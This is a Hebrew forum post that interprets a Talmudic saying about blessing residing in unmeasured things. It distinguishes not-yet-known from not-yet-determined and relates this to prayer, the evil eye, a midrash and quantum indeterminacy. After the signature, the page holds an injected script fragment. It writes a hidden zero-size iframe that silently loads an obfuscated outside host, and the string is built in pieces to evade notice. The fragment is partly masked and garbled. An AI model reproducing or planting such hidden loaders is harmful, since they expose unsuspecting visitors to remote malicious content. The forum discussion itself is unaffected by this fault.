כיון שכתבתי ארוך, אני מסכם: יש שתי תפיסות ראשוניות של האדם באשר הוא אדם: מה שכבר קרה הוא קבוע ולא ניתן לשינוי ורק העתיד פתוח לשינוי. או שמה שקרה ולא ידוע לי (לא קבוע אפיסטמולוגית) הוא גם לא קבוע במציאות עד שייספר וייבדק (לא קבוע אונטולוגית).
הגישה שמאמינה שמה לא ידוע לא קבוע מתאימה לחשיבה בלתי ביקורתית של ילד ולעולם שלפני פרוץ המדע. היא גם עונה על תקוה שלנו שמזינה את ההתנהגות שלנו בתחומים רבים, כגון האמונה שכל עוד לא בדקתי מכתב שנכתב אלי, מה שנכתב בו עדיין יכול להשתנות.
כאשר קוראים טקסט, אנו מפרשים אותו לפי הידע המוקדם שלנו. לפי הנחות היסוד שלנו, שרובן ככולן אינן עומדות לבחינה. אם הקורא והמחבר חיים בתרבויות שונות, יתכן שאותו משפט יובן אחרת בידי מי שחיבר אותו ומי שקורא אותו.
דומה בעיני שהקביעה שציטט מואדיב באה לבטא את התחושה שכל עוד דבר לא נבדק ולא נמדד, הוא עדיין בר שינוי. מה שהוא פתוח מבחינה אפיסטמולוגית, כלומר לא סגור מצד ידיעתי, הוא גם פתוח אונטולוגית, כלומר הוא יכול להשתנות. הוא עדיין לא קבוע. כמות התבואה בגורן או כמות החיטים באסם אינה ידועה מפני שהיא לא נספרה ולא נשקלה ויש רק רושם כללי אודותיה. לפיכך אדם עשוי להרגיש שהכמות הזו אינה קבועה. מה שיקבע כמה יש שם אינו העובדה שהיא גדלה בשדה ונקצרה, אלא הספירה שלי היא שתברר ותקבע.
כך אני מפרש את הרקע לדברי ר' יצחק וכל הנאמר שם. ולפי מה שכתבתי, העדר הקביעות אינו תלוי בתפיסה תיאולוגית כזו או אחרת, עד כמה הקב"ה מתערב בבריאה ואם הוא מחולל נסים גלויים, כלומר ששוברים את חוקי הטבע. זו תחושה שנובעת ממקום אחר, מחוסר האבחנה בין מה שלא ידוע לבין מה שבאמת לא נקבע עדיין.
התחושה הזו יכולה לפקוד את האדם בכל מקום בחיים ובמיוחד במקומות בהם אנו מחכים לתשובה שיכולה לשנות הרבה. כל עוד לא פתחתי את הדף המקופל של המבחן שהוחזר לי, הציון שקיבלתי יכול להשתנות. כל עוד לא פתחתי את המעטפה עם התשובה ממקום העבודה שפניתי אליו, עדיין לא נקבע אם הם קיבלו אותי לעבודה או לא. אפילו: כל עוד לא בדקתי באינטרנט מה תוצאות הבדיקות שעשיתי, אז עדיין לא קבוע מה המצב הבריאותי.
אנו יודעים שהעולם שלנו מתנהל באופן דטרמיניסטי. יש סיבות ויש תוצאות. כאשר קצרתי את השדה, כמות התבואה היא קבועה. לא אמצא ולא אוכל למצוא יותר ממה שגדל שם. אפשר רק לאבד מן החיטה בדרך עקב תקלות. אבל באיזו מידה זו ידיעה מודרנית שהאדם כפוי לקבל והיא נכפית על התחושה הראשונית יותר של "לא ידוע - לא קבוע"?
אם אני צודק, ויש לכל אדם תחושה ראשונית כזו שאולי נובעת מתפיסה ילדותית ולא מדעית, אז על סמך האמונה המוטעית הזו ניתן לבנות הלאה. אפשר לקשר זאת לשאלה התיאולוגית אם ה' מחולל ניסים גלויים או נסתרים. ואם מאמינים שלחשיבה חיובית או שלילית של האדם, או לאמירות כאלו, יש השפעה, אז אפשר לפחד שעין הרע במובן של קנאה ואיחול רע יזיקו.
אבל יש לשים לב שהתחושה ש"לא ידוע - לא קבוע" עומדת בפני עצמה בלי קשר לשאלה תיאולוגית או לשאלה האם מאגיה פועלת ברמה של עין הרע.
מה מכל מה שכתבתי נכון לגבי הסוגיה הזו? דומה בעיני שבעל המימרה לוקח את האינטואיציה (במובן של תחושה ראשונית) של כולנו ומשלב אותה בתוך המלצה דתית יהודית. אם דבר לא נקבע, האם לא כדאי להתפלל עליו? ודווקא כל עוד הדברים לא נסגרו, כי מה שלא ידוע לא קבוע. מה שלא נמדד עדיין יכול להשתנות.
הנחת היסוד הזו לגבי הגמישות של המציאות שלא נבדקה מעוררת שאלות. איך בדיוק זה עובד? איך יגיע שפע אם סוף סוף קצרתי כמה שקצרתי ולא יותר? אפשר שבכך התקשה רש"י ואפשר שמשום כך הוא העלה טענה, שאיני מבין, שהשפע "מתברך מעצמו", או, כלשונו, "רבה מאליו".
מצאתי אמירה מקבילה במדרש.
ל, לא ויאמר מה אתן לך. ממון אתן לך בשכרך. לא תתן לי מאומה, לא תתן לי דבר שיש בו מום, לפי שהממון אינו מתברך מאליו, ואין ברכה מצויה בו אלא בדבר הסמוי מן העין, אבל אם תתן לי דבר המתברך מאליו, אשובה ארעה צאנך.
(בראשית רבתי פרשת ויצא [המתחיל בעמוד 117]) כאן "מתברך מאליו" הוא כנראה בעלי חיים שמולידים ופרים ורבים. לעומת ממון שהוא דבר ספור ולכן קבוע.
כמובן, קצב הריבוי של צאן נתפס בעינינו כדבר שבאמת לא נקבע. הרי בשנה מסויימת אפשר שהכבשים יולידו יותר או פחות. בניגוד לכמות התבואה שנקצרה. אולם לגבי ריבוי הצאן בשנה הבאה זה נחשב בעינינו לדבר פתוח באמת, כי הוא בעתיד וטרם התרחש. אם כי הדטרמיניסט יאמר לנו שהדברים כבר נקבעו ואינם בני שינוי ואנו רק טועים להאמין שהעתיד ניתן להיקבעות בידי בחירה אנושית או התפתחות כלשהי.
לפי זה נראה לי שיש כאן שלוש או ארבע רמות של אי היקבעות.
א. מה שכבר קרה: התבואה נקצרה ונספרה - לא ניתן לשינוי (ותפילה על זה תהיה כמסתבר תפילת שווא).
ב. מה שקרה אבל לא נמדד: התבואה באסם ולא נספרה או נשקלה. מבחינה אפיסטמולוגית (הידיעה שלי) זה פתוח. מבחינת הטבע זה כבר נקבע ונסגר. בעולם של פעם, אצל חז"ל, זה נתפס כדבר פתוח לשינוי. ולכן יש טעם להתפלל. וזה גם חשוף להשפעות אחרות, כגון עין הרע. במבט מודרני, יש כאן, לפי התיאוריה שהצגתי על יצירת האמונות שלנו, תפיסה ראשונית של ילד שמתנגשת עם תפיסה מדעית שמתפתחת בגיל מאוחר יותר וגם זה רק בתרבות שיש בה חשיבה מדעית במובן שלנו.
ג. ריבוי הצאן בשנה הבאה, כמו באמירה שציטטתי מן המדרש. כאן גם אנו, בני המאה ה21, חשים שזה פתוח. שזה לא נקבע לא רק אפיסטמולוגית (איני יודע את העתיד) אלא גם אונטולוגית - זה באמת ניתן לשינוי. אמנם גישה כזו מתנגשת עם הדטרמיניזם המדעי. כיון שהנסיבות הנוכחיות הן קבועות ורק לא ידועות לי, והיות שדברים מתרחשים לפי חוקי טבע קשיחים גם אם איני מכיר את החוקים במלואם וגם אם המחשבים שלי לא מסוגלים להריץ את החישובים המורכבים שיספרו לי מה חייב לקרות, עדיין העתיד סגור. אם יעקב אבינו היה בא להתייעץ עם לפלס לגבי השאלה אם עדר צאן מסויים יניב יותר או פחות ולדות, לפלס היה יכול לומר לו שיש תשובה קבועה מראש על פי מערכת חוקים שאינה מוכרת עדיין ולכן הסטטיסטיקאי יכול לספק רק המלצות לגבי עדר זה או אחר אבל לא לתת תשובה מוחלטת. אבל זו אי היקבעות אפיסטמולוגית, לא אונטולוגית.
ד. אי היקבעותו של האלקטרון במערכת שרדינגרית. הפתעה אפיסטמולוגית: לדעת פיזיקאים מסויימים המציאות התת חלקיקית באמת אינה קבועה עד שהיא מתרחשת בפועל. ויתכן שאפשר לגרור את אותה אי היקבעות גם למישור העל חלקיקי ולכן החתול בתיבה של שרדינגר הוא במצב של לא חי ולא מת עד שייבדק. בדיוק כמו האינטואיציה הראשונית שלנו כילדים, מה שסולל דרך לחשיבה מאגית.
*** מתוך הדברים עשויה להשתמע הסתכלות מגבוה על העבר. האם יש מקום לביקורת על חכמינו שהמליצו מה שהמליצו מפני שלא היו מורגלים בחשיבה דטרמיניסטית? זה תלוי בציפיה שלנו מחכמים ובמיוחד מחכמי התלמוד. באי הפורום הזה יודעים שיש התנגשות בין הציפיות שעליהן התחנכנו לחכמה ולידע של חז"ל שלא יכלו לטעות לבין המציאות: הם היו חכמים אבל לנו יש ידיעות שלהם לא היו. וזה לא חסרון בהם. הם עשו את המיטב שיכלו, ביראת שמים. זה מה שאני אומר לעצמי כאשר אני נתקל במה שנראה כטעויות במדע ובהכרת המציאות אצל רבותינו. דומה שהבעייתיות הזו של "איך לפרש שחז"ל הבינו אחרת" היא הבעיה החריפה של האשכול, ולא באיזו מידה דברי חז"ל עשויים להתאים לתיאוריה פיזיקלית מודרנית ואנטי אינטואיטיבית.
___טעות הקלדה תוקנה...______________
שומר פיו ולשונו - שומר מצרות נפשו
< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 16/11/2016 08:26:02
 |
|
|